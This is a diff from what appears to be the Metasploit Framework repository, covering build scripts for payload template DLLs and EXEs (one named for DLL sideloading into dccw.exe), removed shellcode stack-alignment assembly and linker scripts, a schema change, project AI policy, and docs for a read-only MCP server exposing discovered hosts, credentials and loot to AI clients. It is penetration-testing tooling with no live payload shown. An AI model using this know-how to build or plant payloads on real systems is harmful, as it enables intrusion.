dll_gdiplus = @{
|
||||
Dir = 'dll_gdiplus'
|
||||
OutputFmt = 'template_{0}_windows_dccw_gdiplus.dll'
|
||||
Source = '../dll/template.c'
|
||||
ClFlags = @('/LD', '/GS-', '/DBUILDMODE=2', '/I', '.', '/FI', 'exports.h')
|
||||
LinkLibs = @('kernel32.lib')
|
||||
LinkRes = 'template.res'
|
||||
EntryPoint = 'DllMain'
|
||||
RcArgs = @('/v', '/fo', 'template.res', '../dll/template.rc')
|
||||
}
|
||||
dll_mixed_mode = @{
|
||||
Dir = 'dll_mixed_mode'
|
||||
OutputFmt = 'template_{0}_windows_mixed_mode.dll'
|
||||
Source = 'template.cpp'
|
||||
ClFlags = @('/CLR', '/LD', '/GS-', '/I', '..\dll', '/DBUILDMODE=2')
|
||||
LinkLibs = @('mscoree.lib', 'kernel32.lib')
|
||||
EntryPoint = 'DllMain'
|
||||
}
|
||||
}
|
||||
|
||||
if (-not $env:VCINSTALLDIR) {
|
||||
Write-Error 'VCINSTALLDIR is not set. Run this script from a Visual Studio Developer Command Prompt.'
|
||||
exit 1
|
||||
}
|
||||
|
||||
function Invoke-VCVars {
|
||||
param([string]$Arch)
|
||||
# vcvarsall.bat no-ops if VSCMD_VER is already set, so clear its state
|
||||
# flags before re-running. Otherwise the second arch silently inherits
|
||||
# the first arch's toolchain and produces wrong-architecture binaries.
|
||||
foreach ($v in 'VSCMD_VER', 'VSCMD_ARG_TGT_ARCH', 'VSCMD_ARG_HOST_ARCH') {
|
||||
[System.Environment]::SetEnvironmentVariable($v, $null, 'Process')
|
||||
}
|
||||
$vcvars = Join-Path $env:VCINSTALLDIR 'Auxiliary\Build\vcvarsall.bat'
|
||||
cmd /c "`"$vcvars`" $Arch >nul 2>&1 && set" 2>&1 | ForEach-Object {
|
||||
if ($_ -match '^([^=]+)=(.*)$') {
|
||||
[System.Environment]::SetEnvironmentVariable($matches[1], $matches[2], 'Process')
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function Invoke-Cl {
|
||||
param(
|
||||
[string[]]$ClFlags,
|
||||
[string]$Source,
|
||||
[string]$OutputName,
|
||||
[string[]]$LinkLibs,
|
||||
[string]$LinkRes,
|
||||
[string]$EntryPoint,
|
||||
[switch]$NoDefaultLib
|
||||
)
|
||||
$clArgs = $ClFlags + @($Source, "/Fe:$OutputName", '/link') + $LinkLibs
|
||||
if ($LinkRes) { $clArgs += $LinkRes }
|
||||
$clArgs += @("/entry:$EntryPoint", '/subsystem:WINDOWS')
|
||||
if ($NoDefaultLib) { $clArgs += '/NODEFAULTLIB' }
|
||||
& cl @clArgs
|
||||
if ($LASTEXITCODE -ne 0) { Write-Error "cl failed for $OutputName" }
|
||||
}
|
||||
|
||||
function Set-PEVersion {
|
||||
param(
|
||||
[string]$Path,
|
||||
[int]$Major,
|
||||
[int]$Minor
|
||||
)
|
||||
$bytes = [System.IO.File]::ReadAllBytes($Path)
|
||||
$peOffset = [BitConverter]::ToInt32($bytes, 0x3C)
|
||||
if ([System.Text.Encoding]::ASCII.GetString($bytes, $peOffset, 4) -ne "PE`0`0") {
|
||||
Write-Error "$Path is not a valid PE file"
|
||||
return
|
||||
}
|
||||
# PE optional header starts at peOffset + 24. Field offsets from its start:
|
||||
# +40: MajorOperatingSystemVersion (uint16)
|
||||
# +42: MinorOperatingSystemVersion (uint16)
|
||||
# +48: MajorSubsystemVersion (uint16)
|
||||
# +50: MinorSubsystemVersion (uint16)
|
||||
# These offsets are identical for PE32 and PE32+.
|
||||
$opt = $peOffset + 24
|
||||
$verBytes = [BitConverter]::GetBytes([uint16]$Major)
|
||||
$minBytes = [BitConverter]::GetBytes([uint16]$Minor)
|
||||
$bytes[$opt + 40] = $verBytes[0]; $bytes[$opt + 41] = $verBytes[1]
|
||||
$bytes[$opt + 42] = $minBytes[0]; $bytes[$opt + 43] = $minBytes[1]
|
||||
$bytes[$opt + 48] = $verBytes[0]; $bytes[$opt + 49] = $verBytes[1]
|
||||
$bytes[$opt + 50] = $minBytes[0]; $bytes[$opt + 51] = $minBytes[1]
|
||||
[System.IO.File]::WriteAllBytes($Path, $bytes)
|
||||
Write-Host " Patched OS and subsystem version to ${Major}.${Minor}"
|
||||
}
|
||||
|
||||
function Build-Template {
|
||||
param([string]$Arch, [string]$Name)
|
||||
$def = $BuildDefs[$Name]
|
||||
|
||||
Push-Location (Join-Path $ScriptDir $def.Dir)
|
||||
try {
|
||||
if ($def.RcArgs) {
|
||||
& rc @($def.RcArgs)
|
||||
if ($LASTEXITCODE -ne 0) { throw "rc failed for $Name ($Arch)" }
|
||||
}
|
||||
|
||||
$outName = $def.OutputFmt -f $Arch
|
||||
Invoke-Cl -ClFlags $def.ClFlags -Source $def.Source -OutputName $outName `
|
||||
-LinkLibs $def.LinkLibs -LinkRes $def.LinkRes `
|
||||
-EntryPoint $def.EntryPoint -NoDefaultLib:([bool]$def.NoDefaultLib)
|
||||
|
||||
if ($Name -like 'dll*') {
|
||||
$outName256 = $outName -replace '(\.\w+)$', '.256kib$1'
|
||||
Invoke-Cl -ClFlags ($def.ClFlags + '/DSCSIZE=262144') -Source $def.Source -OutputName $outName256 `
|
||||
-LinkLibs $def.LinkLibs -LinkRes $def.LinkRes `
|
||||
-EntryPoint $def.EntryPoint -NoDefaultLib:([bool]$def.NoDefaultLib)
|
||||
}
|
||||
} finally { Pop-Location }
|
||||
|
||||
if ($def.PatchVersion) {
|
||||
$outPath = Join-Path $ScriptDir "$($def.Dir)\$outName"
|
||||
if ($Arch -eq 'x86') {
|
||||
Set-PEVersion -Path $outPath -Major 4 -Minor 0
|
||||
} else {
|
||||
Set-PEVersion -Path $outPath -Major 5 -Minor 2
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
# Build each requested template for each architecture
|
||||
foreach ($arch in $Architectures) {
|
||||
Write-Host "`n=== Configuring for $arch ===" -ForegroundColor Cyan
|
||||
Invoke-VCVars $arch
|
||||
|
||||
foreach ($tmpl in $Templates) {
|
||||
Write-Host "`nBuilding: $tmpl ($arch)" -ForegroundColor Green
|
||||
Build-Template -Arch $arch -Name $tmpl
|
||||
}
|
||||
}
|
||||
|
||||
# Clean intermediate files and move outputs
|
||||
Write-Host "`n=== Cleaning up ===" -ForegroundColor Cyan
|
||||
Get-ChildItem $ScriptDir -Recurse -File |
|
||||
Where-Object { $_.Extension -in '.obj', '.res', '.exp', '.lib' } |
|
||||
Remove-Item -Force
|
||||
|
||||
Write-Host "`n=== Moving outputs to $OutputDir ===" -ForegroundColor Cyan
|
||||
Get-ChildItem $ScriptDir -Recurse -File |
|
||||
Where-Object { $_.Extension -in '.exe', '.dll' } |
|
||||
ForEach-Object {
|
||||
Move-Item $_.FullName (Join-Path $OutputDir $_.Name) -Force
|
||||
Write-Host " $($_.Name)"
|
||||
}
|
||||
|
||||
Write-Host "`nDone." -ForegroundColor Green
|
||||
@@ -1,15 +0,0 @@
|
||||
@echo off
|
||||
|
||||
if "%~1"=="" GOTO NO_ARGUMENTS
|
||||
echo Compiling for: %1
|
||||
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
|
||||
rc /v template.rc
|
||||
cl /LD /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
|
||||
cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 template.c /Fe:template_%1_windows.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
|
||||
exit /B
|
||||
|
||||
:NO_ARGUMENTS
|
||||
%COMSPEC% /c "%0" x86
|
||||
%COMSPEC% /c "%0" x64
|
||||
del *.obj *.res
|
||||
move *.dll ..\..\..
|
||||
@@ -1,15 +0,0 @@
|
||||
@echo off
|
||||
|
||||
if "%~1"=="" GOTO NO_ARGUMENTS
|
||||
echo Compiling for: %1
|
||||
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
|
||||
rc /v /fo template.res ../dll/template.rc
|
||||
cl /LD /GS- /DBUILDMODE=2 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
|
||||
cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
|
||||
exit /B
|
||||
|
||||
:NO_ARGUMENTS
|
||||
%COMSPEC% /c "%0" x86
|
||||
%COMSPEC% /c "%0" x64
|
||||
del *.exp *.lib *.res *.obj
|
||||
move *.dll ..\..\..
|
||||
@@ -1,15 +0,0 @@
|
||||
@echo off
|
||||
|
||||
if "%~1"=="" GOTO NO_ARGUMENTS
|
||||
echo Compiling for: %1
|
||||
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
|
||||
rem mscoree.lib requires .NET SDK to be installed, add it as a Visual Studio component
|
||||
cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
|
||||
cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 /DSCSIZE=262144 template.cpp /Fe:template_%1_windows_mixed_mode.256kib.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
|
||||
exit /B
|
||||
|
||||
:NO_ARGUMENTS
|
||||
%COMSPEC% /c "%0" x86
|
||||
%COMSPEC% /c "%0" x64
|
||||
del *.obj
|
||||
move *.dll ..\..\..
|
||||
@@ -1,13 +0,0 @@
|
||||
@echo off
|
||||
|
||||
if "%~1"=="" GOTO NO_ARGUMENTS
|
||||
echo Compiling for: %1
|
||||
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
|
||||
cl /GS- template.c /Fe:template_%1_windows.exe /link kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
|
||||
exit /B
|
||||
|
||||
:NO_ARGUMENTS
|
||||
%COMSPEC% /c "%0" x86
|
||||
%COMSPEC% /c "%0" x64
|
||||
del *.obj *.res
|
||||
move *.exe ..\..\..
|
||||
@@ -1,13 +0,0 @@
|
||||
@echo off
|
||||
|
||||
if "%~1"=="" GOTO NO_ARGUMENTS
|
||||
echo Compiling for: %1
|
||||
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
|
||||
cl /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows_svc.exe /link advapi32.lib kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
|
||||
exit /B
|
||||
|
||||
:NO_ARGUMENTS
|
||||
%COMSPEC% /c "%0" x86
|
||||
%COMSPEC% /c "%0" x64
|
||||
del *.obj *.res
|
||||
move *.exe ..\..\..
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,48 +0,0 @@
|
||||
/*
|
||||
* This code is provided under the 3-clause BSD license below.
|
||||
* ***********************************************************
|
||||
*
|
||||
* Copyright (c) 2013, Matthew Graeber
|
||||
* All rights reserved.
|
||||
*
|
||||
* Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
|
||||
*
|
||||
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
|
||||
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
|
||||
* The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
|
||||
*
|
||||
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
*/
|
||||
|
||||
; Author: Matthew Graeber (@mattifestation)
|
||||
; License: BSD 3-Clause
|
||||
; Syntax: MASM
|
||||
; Build Syntax: ml64 /c /Cx AdjustStack.asm
|
||||
; Output: AdjustStack.obj
|
||||
; Notes: I really wanted to avoid having this external dependency but I couldnt
|
||||
; come up with any other way to guarantee 16-byte stack alignment in 64-bit
|
||||
; shellcode written in C.
|
||||
|
||||
extern ExecutePayload
|
||||
global AlignRSP ; Marking AlignRSP as PUBLIC allows for the function
|
||||
; to be called as an extern in our C code.
|
||||
|
||||
segment .text
|
||||
|
||||
; AlignRSP is a simple call stub that ensures that the stack is 16-byte aligned prior
|
||||
; to calling the entry point of the payload. This is necessary because 64-bit functions
|
||||
; in Windows assume that they were called with 16-byte stack alignment. When amd64
|
||||
; shellcode is executed, you cant be assured that you stack is 16-byte aligned. For example,
|
||||
; if your shellcode lands with 8-byte stack alignment, any call to a Win32 function will likely
|
||||
; crash upon calling any ASM instruction that utilizes XMM registers (which require 16-byte)
|
||||
; alignment.
|
||||
|
||||
AlignRSP:
|
||||
push rsi ; Preserve RSI since were stomping on it
|
||||
mov rsi, rsp ; Save the value of RSP so it can be restored
|
||||
and rsp, 0FFFFFFFFFFFFFFF0h ; Align RSP to 16 bytes
|
||||
sub rsp, 020h ; Allocate homing space for ExecutePayload
|
||||
call ExecutePayload ; Call the entry point of the payload
|
||||
mov rsp, rsi ; Restore the original value of RSP
|
||||
pop rsi ; Restore RSI
|
||||
ret ; Return to caller
|
||||
@@ -1,9 +0,0 @@
|
||||
ENTRY(_ExecutePayload)
|
||||
SECTIONS
|
||||
{
|
||||
.text :
|
||||
{
|
||||
*(.text.ExecutePayload)
|
||||
}
|
||||
|
||||
}
|
||||
@@ -1,11 +0,0 @@
|
||||
ENTRY(AlignRSP)
|
||||
SECTIONS
|
||||
{
|
||||
.text :
|
||||
{
|
||||
*(.text.AlignRSP)
|
||||
*(.text.ExecutePayload)
|
||||
*(.text.GetProcAddressWithHash)
|
||||
}
|
||||
|
||||
}
|
||||
+22366
-2617
File diff suppressed because it is too large
Load Diff
+10
-1
@@ -10,7 +10,7 @@
|
||||
#
|
||||
# It's strongly recommended that you check this file into your version control system.
|
||||
|
||||
ActiveRecord::Schema[7.2].define(version: 2025_07_21_114306) do
|
||||
ActiveRecord::Schema[7.2].define(version: 2026_04_11_000000) do
|
||||
# These are extensions that must be enabled in order to support this database
|
||||
enable_extension "plpgsql"
|
||||
|
||||
@@ -576,6 +576,12 @@ ActiveRecord::Schema[7.2].define(version: 2025_07_21_114306) do
|
||||
t.index ["module_run_id"], name: "index_sessions_on_module_run_id"
|
||||
end
|
||||
|
||||
create_table "sessions_tags", force: :cascade do |t|
|
||||
t.integer "session_id"
|
||||
t.integer "tag_id"
|
||||
t.index ["session_id", "tag_id"], name: "index_sessions_tags_on_session_id_and_tag_id", unique: true
|
||||
end
|
||||
|
||||
create_table "tags", id: :serial, force: :cascade do |t|
|
||||
t.integer "user_id"
|
||||
t.string "name", limit: 1024
|
||||
@@ -646,6 +652,7 @@ ActiveRecord::Schema[7.2].define(version: 2025_07_21_114306) do
|
||||
t.string "company"
|
||||
t.string "prefs", limit: 524288
|
||||
t.boolean "admin", default: true, null: false
|
||||
t.boolean "sso_enabled", default: false, null: false
|
||||
end
|
||||
|
||||
create_table "vuln_attempts", id: :serial, force: :cascade do |t|
|
||||
@@ -658,6 +665,8 @@ ActiveRecord::Schema[7.2].define(version: 2025_07_21_114306) do
|
||||
t.integer "session_id"
|
||||
t.integer "loot_id"
|
||||
t.text "fail_detail"
|
||||
t.string "check_code"
|
||||
t.text "check_detail"
|
||||
end
|
||||
|
||||
create_table "vuln_details", id: :serial, force: :cascade do |t|
|
||||
|
||||
@@ -72,3 +72,18 @@ Preferred Skills: Experience using containers; understanding of container defini
|
||||
|
||||
If you want to suggest your own idea, please discuss it with us first on [Slack](https://metasploit.com/slack) in the
|
||||
`#gsoc` channel to make sure it is a reasonable amount of work for a summer and that it fits the goals of the project.
|
||||
|
||||
## AI Usage Policy
|
||||
We understand that AI aided development seems to be the future and we have no strong opposition towards GSoC contributors using
|
||||
AI, responsibly. All code submitted for review must be both understood and tested successfully by the contributor and testing output or
|
||||
proof of working functionality must be included in the PR description.
|
||||
|
||||
### Note on AI
|
||||
Beware that although AI can be a powerful tool, it often generates more code than is needed and has the tendency to
|
||||
rewrite library functionality that has already been implemented in the Metasploit-Framework. The best way to learn how
|
||||
to do something in Framework is to traverse the code base, study modules which follow similar exploit paths and if you
|
||||
have questions you can always ask in [Slack](https://metasploit.com/slack). At its current maturity level AI is great for helping with smaller tasks.
|
||||
For example, if you are new to writing Ruby code, ask how to parse a hash and iterate over both the keys and values,
|
||||
and it will likely be very helpful. Larger tasks, it will struggle with. For example, if you ask “I would like you to
|
||||
write a Metasploit module for this CVE / PoC” it will generate lots of code (aka slop) that will not run. PRs submitted
|
||||
that do not work and have clearly been AI generated will not be reviewed and repeated offenders will have disciplinary action applied.
|
||||
|
||||
@@ -81,14 +81,17 @@ Any object passed to `cookie` that isn't an instance of HttpCookieJar will have
|
||||
|
||||
----
|
||||
|
||||
Module authors can also pass an instance of `HttpCookieJar` with the `cookie` option:
|
||||
Module authors can also pass an instance of `HttpCookieJar` with the `cookie` option.
|
||||
|
||||
Important: Cookies added to a `HttpCookieJar` must have both `domain` and `path` set, and cookie values must be strings. Without these attributes the underlying cookie store will raise an `ArgumentError`.
|
||||
|
||||
```ruby
|
||||
cj = Msf::Exploit::Remote::HTTP::HttpCookieJar.new
|
||||
|
||||
cj.add(Msf::Exploit::Remote::HTTP::HttpCookie.new('PHPSESSID', @phpsessid))
|
||||
cj.add(Msf::Exploit::Remote::HTTP::HttpCookie.new('AsWebStatisticsCooKie', 1))
|
||||
cj.add(Msf::Exploit::Remote::HTTP::HttpCookie.new('shellinaboxCooKie', 1))
|
||||
target_host = datastore['RHOST']
|
||||
cj.add(Msf::Exploit::Remote::HTTP::HttpCookie.new('PHPSESSID', @phpsessid, domain: target_host, path: '/'))
|
||||
cj.add(Msf::Exploit::Remote::HTTP::HttpCookie.new('AsWebStatisticsCooKie', '1', domain: target_host, path: '/'))
|
||||
cj.add(Msf::Exploit::Remote::HTTP::HttpCookie.new('shellinaboxCooKie', '1', domain: target_host, path: '/'))
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
|
||||
@@ -64,7 +64,7 @@ Consider the following example as your HTML response:
|
||||
<div id="french">Bonjour</div>
|
||||
</div>
|
||||
</body>
|
||||
<html>
|
||||
</html>
|
||||
```
|
||||
|
||||
**Basic usage of #at**
|
||||
|
||||
@@ -0,0 +1,366 @@
|
||||
The Metasploit MCP Server (`msfmcpd`) provides AI applications with secure, structured access to Metasploit Framework data through the [Model Context Protocol](https://modelcontextprotocol.io/) (MCP). It acts as a middleware layer between AI clients (such as Claude, Cursor, or custom agents) and Metasploit, exposing 8 standardized tools for querying reconnaissance data and searching modules.
|
||||
|
||||
This initial implementation is **read-only**. Only tools that query data (modules, hosts, services, vulnerabilities, etc.) are available. Tools for module execution, session interaction, and database modifications will be added in a future iteration.
|
||||
|
||||
## Architecture
|
||||
|
||||
```mermaid
|
||||
flowchart TD
|
||||
ai_app["AI Application<br>(Claude, Cursor, etc.)"]
|
||||
|
||||
subgraph msfmcp_server["MsfMcp Server"]
|
||||
mcp_layer["MCP Layer (8 Tools)<br>Input Validation / Rate Limiting / Response Transformation"]
|
||||
rpc_manager["RPC Manager<br>Auto-detect / Auto-start / Lifecycle Management"]
|
||||
api_client["Metasploit API Client<br>MessagePack RPC (port 55553) / JSON-RPC (port 8081)<br>Session Management"]
|
||||
|
||||
mcp_layer --> rpc_manager
|
||||
rpc_manager --> api_client
|
||||
end
|
||||
|
||||
msf["Metasploit Framework<br>(msfrpcd)"]
|
||||
|
||||
ai_app -- "MCP Protocol (stdio or HTTP)<br>JSON-RPC 2.0" --> mcp_layer
|
||||
api_client -- "HTTP/HTTPS" --> msf
|
||||
```
|
||||
|
||||
## Quick Start
|
||||
|
||||
The simplest way to start the MCP server is with no arguments:
|
||||
|
||||
```
|
||||
./msfmcpd
|
||||
```
|
||||
|
||||
The server automatically detects whether a Metasploit RPC server is already running on the configured port. If not, it starts one automatically with randomly generated credentials.
|
||||
|
||||
To use specific credentials:
|
||||
|
||||
```
|
||||
./msfmcpd --user your_username --password your_password
|
||||
```
|
||||
|
||||
## Configuration
|
||||
|
||||
### Configuration File
|
||||
|
||||
Copy the example configuration and edit it:
|
||||
|
||||
```
|
||||
cp config/mcp_config.yaml.example config/mcp_config.yaml
|
||||
```
|
||||
|
||||
A MessagePack RPC configuration looks like this:
|
||||
|
||||
```yaml
|
||||
msf_api:
|
||||
type: messagepack
|
||||
host: localhost
|
||||
port: 55553
|
||||
ssl: true
|
||||
endpoint: /api/
|
||||
user: msfuser
|
||||
password: CHANGEME
|
||||
auto_start_rpc: true
|
||||
|
||||
mcp:
|
||||
transport: stdio
|
||||
|
||||
rate_limit:
|
||||
enabled: true
|
||||
requests_per_minute: 60
|
||||
burst_size: 10
|
||||
|
||||
logging:
|
||||
enabled: false
|
||||
level: INFO
|
||||
log_file: msfmcp.log
|
||||
```
|
||||
|
||||
For JSON-RPC with bearer token authentication, use the JSON-RPC example instead:
|
||||
|
||||
```
|
||||
cp config/mcp_config_jsonrpc.yaml.example config/mcp_config.yaml
|
||||
```
|
||||
|
||||
### Command-Line Options
|
||||
|
||||
```
|
||||
./msfmcpd --help
|
||||
|
||||
Options:
|
||||
--config PATH Path to configuration file
|
||||
--enable-logging Enable file logging with sanitization
|
||||
--log-file PATH Log file path (overrides config file)
|
||||
--user USER MSF API username (for MessagePack auth)
|
||||
--password PASS MSF API password (for MessagePack auth)
|
||||
--no-auto-start-rpc Disable automatic RPC server startup
|
||||
--mcp-transport TRANSPORT MCP server transport type ('stdio' or 'http')
|
||||
-h, --help Show this help message
|
||||
-v, --version Show version information
|
||||
```
|
||||
|
||||
### Environment Variable Overrides
|
||||
|
||||
All configuration settings can be overridden by environment variables:
|
||||
|
||||
| Variable | Description |
|
||||
|---|---|
|
||||
| `MSF_API_TYPE` | Connection type (`messagepack` or `json-rpc`) |
|
||||
| `MSF_API_HOST` | Metasploit RPC API host |
|
||||
| `MSF_API_PORT` | Metasploit RPC API port |
|
||||
| `MSF_API_SSL` | Use SSL for Metasploit RPC API (`true` or `false`) |
|
||||
| `MSF_API_ENDPOINT` | Metasploit RPC API endpoint |
|
||||
| `MSF_API_USER` | RPC API username (for MessagePack auth) |
|
||||
| `MSF_API_PASSWORD` | RPC API password (for MessagePack auth) |
|
||||
| `MSF_API_TOKEN` | RPC API token (for JSON-RPC auth) |
|
||||
| `MSF_AUTO_START_RPC` | Auto-start RPC server (`true` or `false`) |
|
||||
| `MSF_MCP_TRANSPORT` | MCP transport type (`stdio` or `http`) |
|
||||
| `MSF_MCP_HOST` | MCP server host (for HTTP transport) |
|
||||
| `MSF_MCP_PORT` | MCP server port (for HTTP transport) |
|
||||
|
||||
Example using environment variables:
|
||||
|
||||
```
|
||||
MSF_API_HOST=192.168.33.44 ./msfmcpd --config ./config/mcp_config.yaml
|
||||
```
|
||||
|
||||
## Automatic RPC Server Management
|
||||
|
||||
When using MessagePack RPC on localhost, the MCP server can automatically manage the Metasploit RPC server lifecycle. This is enabled by default.
|
||||
|
||||
### How It Works
|
||||
|
||||
1. **Detection**: On startup, the MCP server probes the configured RPC port to check if a server is already running.
|
||||
2. **Auto-start**: If no server is detected, it spawns the `msfrpcd` executable as a child process.
|
||||
3. **Credentials**: If no username and password are provided, random credentials are generated automatically and used for both the RPC server and client authentication.
|
||||
4. **Wait**: After starting, it polls the port until the RPC server becomes available (timeout: 30 seconds).
|
||||
5. **Shutdown**: When the MCP server shuts down (via Ctrl+C or SIGTERM), it cleans up the managed RPC process.
|
||||
|
||||
**Note**: If an RPC server is already running, credentials must be provided via `--user`/`--password`, config file, or environment variables to authenticate with it.
|
||||
|
||||
### Database Support
|
||||
|
||||
The auto-started RPC server creates a framework instance with database support enabled by default. If the database is not running when the RPC server starts, a warning is displayed:
|
||||
|
||||
```
|
||||
[WARNING] Database is not available. Some MCP tools that rely on the database will not work.
|
||||
[WARNING] Start the database and restart the MCP server to enable full functionality.
|
||||
```
|
||||
|
||||
Tools that query the database (`msf_host_info`, `msf_service_info`, `msf_vulnerability_info`, `msf_note_info`, `msf_credential_info`, `msf_loot_info`) require a running database. To initialize and start the database:
|
||||
|
||||
```
|
||||
msfdb init
|
||||
msfdb start
|
||||
```
|
||||
|
||||
Then restart the MCP server.
|
||||
|
||||
### Disabling Auto-Start
|
||||
|
||||
Auto-start can be disabled in three ways:
|
||||
|
||||
- CLI flag: `--no-auto-start-rpc`
|
||||
- Config file: `auto_start_rpc: false` in the `msf_api` section
|
||||
- Environment variable: `MSF_AUTO_START_RPC=false`
|
||||
|
||||
Auto-start is also not available when:
|
||||
|
||||
- The API type is `json-rpc` (requires SSL certificates and a web server)
|
||||
- The host is a remote address (cannot start a server on a remote machine)
|
||||
|
||||
When auto-start is disabled and no RPC server is running, you must start `msfrpcd` manually:
|
||||
|
||||
```
|
||||
msfrpcd -U your_username -P your_password -p 55553
|
||||
```
|
||||
|
||||
## MCP Tools
|
||||
|
||||
The server exposes 8 tools to AI applications via the MCP protocol.
|
||||
|
||||
### msf_search_modules
|
||||
|
||||
Search for Metasploit modules by keywords, CVE IDs, or module names.
|
||||
|
||||
- `query` (string, required): Search terms (e.g., `windows smb`, `CVE-2017-0144`)
|
||||
- `limit` (integer, optional): Max results (1-1000, default: 100)
|
||||
- `offset` (integer, optional): Pagination offset (default: 0)
|
||||
|
||||
### msf_module_info
|
||||
|
||||
Get detailed information about a specific Metasploit module.
|
||||
|
||||
- `type` (string, required): Module type (`exploit`, `auxiliary`, `post`, `payload`, `encoder`, `nop`)
|
||||
- `name` (string, required): Module path (e.g., `windows/smb/ms17_010_eternalblue`)
|
||||
|
||||
Returns complete module details including options, targets, references, and authors.
|
||||
|
||||
### msf_host_info
|
||||
|
||||
Query discovered hosts from the Metasploit database.
|
||||
|
||||
- `workspace` (string, optional): Workspace name (default: `default`)
|
||||
- `addresses` (string, optional): Filter by IP/CIDR (e.g., `192.168.1.0/24`)
|
||||
- `only_up` (boolean, optional): Only return alive hosts (default: false)
|
||||
- `limit` (integer, optional): Max results (1-1000, default: 100)
|
||||
- `offset` (integer, optional): Pagination offset (default: 0)
|
||||
|
||||
### msf_service_info
|
||||
|
||||
Query discovered services on hosts.
|
||||
|
||||
- `workspace` (string, optional): Workspace name
|
||||
- `names` (string, optional): Filter by service names, comma-separated (e.g., `http`, `ldap,ssh`)
|
||||
- `host` (string, optional): Filter by host IP
|
||||
- `ports` (string, optional): Filter by port or range (e.g., `80,443` or `1-1024`)
|
||||
- `protocol` (string, optional): Protocol filter (`tcp` or `udp`)
|
||||
- `only_up` (boolean, optional): Only return running services (default: false)
|
||||
- `limit` (integer, optional): Max results (1-1000, default: 100)
|
||||
- `offset` (integer, optional): Pagination offset (default: 0)
|
||||
|
||||
### msf_vulnerability_info
|
||||
|
||||
Query discovered vulnerabilities.
|
||||
|
||||
- `workspace` (string, optional): Workspace name
|
||||
- `names` (array of strings, optional): Filter by vulnerability names (exact, case-sensitive module names)
|
||||
- `host` (string, optional): Filter by host IP
|
||||
- `ports` (string, optional): Filter by port or range
|
||||
- `protocol` (string, optional): Protocol filter (`tcp` or `udp`)
|
||||
- `limit` (integer, optional): Max results (1-1000, default: 100)
|
||||
- `offset` (integer, optional): Pagination offset (default: 0)
|
||||
|
||||
### msf_note_info
|
||||
|
||||
Query notes stored in the database.
|
||||
|
||||
- `workspace` (string, optional): Workspace name
|
||||
- `type` (string, optional): Filter by note type (e.g., `ssl.certificate`, `smb.fingerprint`)
|
||||
- `host` (string, optional): Filter by host IP
|
||||
- `ports` (string, optional): Filter by port or range
|
||||
- `protocol` (string, optional): Protocol filter (`tcp` or `udp`)
|
||||
- `limit` (integer, optional): Max results (1-1000, default: 100)
|
||||
- `offset` (integer, optional): Pagination offset (default: 0)
|
||||
|
||||
### msf_credential_info
|
||||
|
||||
Query discovered credentials.
|
||||
|
||||
- `workspace` (string, optional): Workspace name
|
||||
- `limit` (integer, optional): Max results (1-1000, default: 100)
|
||||
- `offset` (integer, optional): Pagination offset (default: 0)
|
||||
|
||||
### msf_loot_info
|
||||
|
||||
Query collected loot (files, data dumps).
|
||||
|
||||
- `workspace` (string, optional): Workspace name
|
||||
- `limit` (integer, optional): Max results (1-1000, default: 100)
|
||||
- `offset` (integer, optional): Pagination offset (default: 0)
|
||||
|
||||
## Integration with AI Applications
|
||||
|
||||
Add the MCP server to your AI application configuration. The exact format depends on the client.
|
||||
|
||||
### Claude Desktop / Cursor
|
||||
|
||||
```json
|
||||
{
|
||||
